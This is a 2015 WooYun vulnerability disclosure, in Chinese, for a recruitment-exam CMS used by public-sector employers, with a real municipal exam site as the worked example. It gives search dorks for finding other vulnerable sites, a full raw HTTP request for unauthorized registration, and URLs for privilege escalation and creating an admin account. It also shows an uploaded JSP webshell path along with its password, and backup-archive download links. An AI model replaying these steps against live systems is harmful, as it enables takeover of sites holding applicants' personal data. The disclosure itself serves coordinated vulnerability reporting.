当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090608

漏洞标题:某通用型事业单位招聘考试网任意用户注册+任意文件上传

相关厂商:厦门金才科技有限公司

漏洞作者: 茜茜公主

提交时间:2015-01-12 15:06

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-12: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-19: 细节向第三方安全合作伙伴开放
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

上一次因为引用了2个未修复的漏洞,导致重复未通过,好伤心,这次望通过
1#任意用户注册
2#管理页面越权访问
3#任意文件上传
4#站点备份文件下载

详细说明:

百度关键字:技术支持:厦门金才科技有限公司
或:"首页 招聘动态 招聘公示 政策法规 岗位查询 报名流程 常见问题"
或:inurl:sydwzk/policy
该类型cms之前提交的任意文件下载和简历未授权访问未修复,具体可以参考白帽子酱油甲的 WooYun: 某事业单位用人才系统存在任意文件下载漏洞和越权查看简历
本漏洞以三明人事考试网为例

http://www.smrsks.com/


1#任意用户注册,部分网站有设置用户注册时间段

QQ截图20150102161011.jpg


没有关系,我们可通过POST以下数据进行普通用户注册 

POST http://www.smrsks.com/syrcservlet?RequestType=NEW&RightCode=Guest&flag=add&userNo=wooyun&step=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.smrsks.com/syrcservlet?RequestType=NEW&RightCode=Guest&flag=checkcount
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df1872420216
Accept-Encoding: gzip, deflate
Host: www.smrsks.com
Content-Length: 1925
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=8A87F85079BF1A7455B44377943214A0.mzsyzp1
-----------------------------7df1872420216
Content-Disposition: form-data; name="UserNO"
wooyun
-----------------------------7df1872420216
Content-Disposition: form-data; name="PWD"
123456
-----------------------------7df1872420216
Content-Disposition: form-data; name="ConfirmPWD"
123456
-----------------------------7df1872420216
Content-Disposition: form-data; name="Email"
[email protected]
-----------------------------7df1872420216
Content-Disposition: form-data; name="imgCode"
1680
-----------------------------7df1872420216
Content-Disposition: form-data; name="UserName"
wooyun
-----------------------------7df1872420216
Content-Disposition: form-data; name="IDCardNo"
-----------------------------7df1872420216
Content-Disposition: form-data; name="Birthday"
1965-01-29
-----------------------------7df1872420216
Content-Disposition: form-data; name="Sex"
1
-----------------------------7df1872420216
Content-Disposition: form-data; name="isxiamenplace"
0
-----------------------------7df1872420216
Content-Disposition: form-data; name="isCompanyWorker"
0
-----------------------------7df1872420216
Content-Disposition: form-data; name="nativePlace"
�㶫ʡ÷����
-----------------------------7df1872420216
Content-Disposition: form-data; name="whereFrom"
�㶫ʡ÷����
-----------------------------7df1872420216
Content-Disposition: form-data; name="whereFromID"
2207
-----------------------------7df1872420216
Content-Disposition: form-data; name="Nation"
��
-----------------------------7df1872420216
Content-Disposition: form-data; name="polityVisage"
Ⱥ��
-----------------------------7df1872420216
Content-Disposition: form-data; name="RightCode"
Guest
-----------------------------7df1872420216
Content-Disposition: form-data; name="memberId"
0
-----------------------------7df1872420216--


以刚才POST注册的用户登录系统(wooyun/123456)

QQ截图20150102161227.jpg


2#管理页面越权访问(使用wooyun/123456登录) 

http://www.smrsks.com/sysmenu/SysMenuFrmset.jsp


QQ截图20150102170856.jpg


从该页面可得到非常多的系统关键信息 在线用户管理链接地址 http://www.smrsks.com/sysman/onlineusermng.jsp

QQ截图20150102171145.jpg


个人用户管理链接地址 

http://www.smrsks.com/userservlet?RequestType=LISTSTUDENT


QQ截图20150102171355.jpg


甚至可以通过该页面直接修改用户密码

QQ截图20150102171520.jpg


通过该链接的参数RequestType,我就在想,把LISTSTUDENT改改会有什么效果 

http://www.smrsks.com/userservlet?RequestType=LIST


很普通的一个用户管理界面,但木有用户

QQ截图20150102174533.jpg


新增:

http://www.smrsks.com/userservlet?RequestType=NEW&deptID=0&RightCode=R030201


这里我仿佛看到了什么deptID=0 然后我就deptID=1~10了下,果然可行

QQ截图20150102174948.jpg


接着我又发现了查询,通过查询获得了所有管理用户帐号和信息,这时可以尝试一下弱口令,略过 http://www.smrsks.com/userservlet?RequestType=HIGHFIND&deptID=0

QQ截图20150102175222.jpg


利用

http://www.smrsks.com/userservlet?RequestType=NEW&deptID=5&RightCode=R030201


我们尝试新建一个管理员账户

QQ截图20150102193601.jpg


QQ截图20150102193638.jpg


删除管理员我就不试了,你们懂的。 退出现有帐号,尝试用刚才新建的wooyunadmin/123456登录系统

QQ截图20150102194043.jpg


3#任意文件上传(使用wooyunadmin/123456)在信息发布->下载中心处,可任意上传shell,普通用户也有上传权限(但上传后不会返回上传路径及文件名)

QQ截图20150102194605.jpg


QQ截图20150102194659.jpg


http://www.smrsks.com/download/2015/1420199138046.jsp

密码sqzr


4#站点备份文件下载(部分站点)
http://125.89.152.180:888/Root.rar
http://www.smrsks.com/Root.rar
等等,不一一列举

漏洞证明:

QQ截图20150102171355.jpg


QQ截图20150102194659.jpg


菜刀:

QQ截图20150102195154.jpg


修复方案:

加强权限控制
上传点做好过滤

版权声明:转载请注明来源 茜茜公主@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-16 14:12

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无